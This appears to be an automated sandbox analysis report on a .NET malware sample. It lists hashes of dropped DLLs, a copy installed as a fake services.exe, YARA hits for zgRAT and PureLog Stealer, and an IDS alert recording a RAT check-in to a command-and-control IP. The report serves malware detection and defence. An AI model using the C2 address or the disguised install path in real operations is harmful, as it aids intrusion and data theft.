                                                              Encrypted:false
                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):126976
                                                              Entropy (8bit):6.057993947082715
                                                              Encrypted:false
                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24576
                                                              Entropy (8bit):5.535426842040921
                                                              Encrypted:false
                                                              SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                              MD5:5420053AF2D273C456FB46C2CDD68F64
                                                              SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                              SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                              SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38912
                                                              Entropy (8bit):5.679286635687991
                                                              Encrypted:false
                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34304
                                                              Entropy (8bit):5.618776214605176
                                                              Encrypted:false
                                                              SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                              MD5:9B25959D6CD6097C0EF36D2496876249
                                                              SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                              SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                              SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 9%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):39936
                                                              Entropy (8bit):5.629584586954759
                                                              Encrypted:false
                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):89600
                                                              Entropy (8bit):5.905167202474779
                                                              Encrypted:false
                                                              SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                              MD5:06442F43E1001D860C8A19A752F19085
                                                              SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                              SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                              SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 16%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32256
                                                              Entropy (8bit):5.631194486392901
                                                              Encrypted:false
                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):28160
                                                              Entropy (8bit):5.570953308352568
                                                              Encrypted:false
                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24064
                                                              Entropy (8bit):5.492504448438552
                                                              Encrypted:false
                                                              SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                              MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                              SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                              SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                              SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):294912
                                                              Entropy (8bit):6.010605469502259
                                                              Encrypted:false
                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36352
                                                              Entropy (8bit):5.668291349855899
                                                              Encrypted:false
                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):89600
                                                              Entropy (8bit):5.905167202474779
                                                              Encrypted:false
                                                              SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                              MD5:06442F43E1001D860C8A19A752F19085
                                                              SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                              SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                              SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 16%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):5.41854385721431
                                                              Encrypted:false
                                                              SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                              MD5:BBDE7073BAAC996447F749992D65FFBA
                                                              SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                              SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                              SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):46592
                                                              Entropy (8bit):5.870612048031897
                                                              Encrypted:false
                                                              SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                              MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                              SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                              SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                              SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38400
                                                              Entropy (8bit):5.699005826018714
                                                              Encrypted:false
                                                              SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                              MD5:87765D141228784AE91334BAE25AD743
                                                              SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                              SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                              SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33280
                                                              Entropy (8bit):5.634433516692816
                                                              Encrypted:false
                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33280
                                                              Entropy (8bit):5.634433516692816
                                                              Encrypted:false
                                                              SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                              MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                              SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                              SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                              SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23552
                                                              Entropy (8bit):5.529329139831718
                                                              Encrypted:false
                                                              SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                              MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                              SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                              SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                              SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24576
                                                              Entropy (8bit):5.535426842040921
                                                              Encrypted:false
                                                              SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                              MD5:5420053AF2D273C456FB46C2CDD68F64
                                                              SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                              SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                              SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):5.645950918301459
                                                              Encrypted:false
                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):76
                                                              Entropy (8bit):5.387610697848139
                                                              Encrypted:false
                                                              SSDEEP:3:jThxr40xD8rjHQfs9KiXpspu7YN:H35SHHQfs9KiXpsAsN
                                                              MD5:2A32B576ED5403F831A0E45D7B744755
                                                              SHA1:0C52E2F7875B3F0653B5256522F54A8C9184F032
                                                              SHA-256:EDA524598EBCEADC44B5DCD495977A19EE9149A6387FDB7FA224FD918FAA1D78
                                                              SHA-512:C3D82F0BA21AB5B57E54B595F99029E49B1271F9F439B502E30E69579A6A3CF47265B75C6E24793DAFD9E53F842DFD82B243B5949337002A1ECCBB5157A819B6
                                                              Malicious:false
                                                              Preview:U30vXJVhgWZpcg6QQHA3yq4wuf7Mr5EDfZGLWwVlmQuYkTXEdPtKWvQn8EB2LI0lSWKDau3evZQh
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\InputMethod\CHT\services.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Windows\System32\PING.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):502
                                                              Entropy (8bit):4.609881103024484
                                                              Encrypted:false
                                                              SSDEEP:12:Pm5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:IdUOAokItULVDv
                                                              MD5:090721B3331E7B2CBC136B28C400B401
                                                              SHA1:D098C0F093F586DB6EA9A673B06070404A299A6B
                                                              SHA-256:24999BB5B73171AB47092A9F4E73C466DAF8F80EB4CFAFF2FED0016296301C60
                                                              SHA-512:20365BA8EDE22105BC90A908930F5F233020D59754B83AC42B31591DA36D1729138C5DD6D023E8C4C031711F0230754FA2AABED9759DD5B9D3A6B358544D0DC0
                                                              Malicious:false
                                                              Preview:..Pinging 835180 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):3.7593823756442295
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:XNPOazHpXF.exe
                                                              File size:10'393'088 bytes
                                                              MD5:adae028e0a5a72d219a02bb06d92241a
                                                              SHA1:7cae683f773d541bd5c76ce6491ccb2f2f05c08a
                                                              SHA256:3ac51e8fc3aa517aea4640efaffa1b04301c14dc876104e09ab9b7a3a95a0415
                                                              SHA512:fe8ef741de45a6bde2b48322ef33ee9662b0cbc4caabb582f405850cb0ab58d286e96c5e28e47a0968b17bae6874f938973d6ed7f27e6a9db3a16ed0b63aa1e6
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              TLSH:6DA6E006A9629A33C2567F349CE7102E83E0D6667533EF1B3A2F56917C172309B172B7
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@................................
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x7b892e
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3b88e0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ba000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3bc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x3b6934 | 0x3b6a00 | 5e0b68212aa49485af8080b41ece4a07 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x3ba000 | 0x370 | 0x400 | 2cf46166977c39af7fde4d8438eccbc8 | False | 0.3779296875 | data | 2.867353130536527 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x3bc000 | 0xc | 0x200 | d03e96aaab1190e6e758e8c1c341af92 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x3ba058 | 0x318 | data | | | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-21T10:47:25.908690+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.5 | 49714 | 89.23.96.180 | 80 | TCP
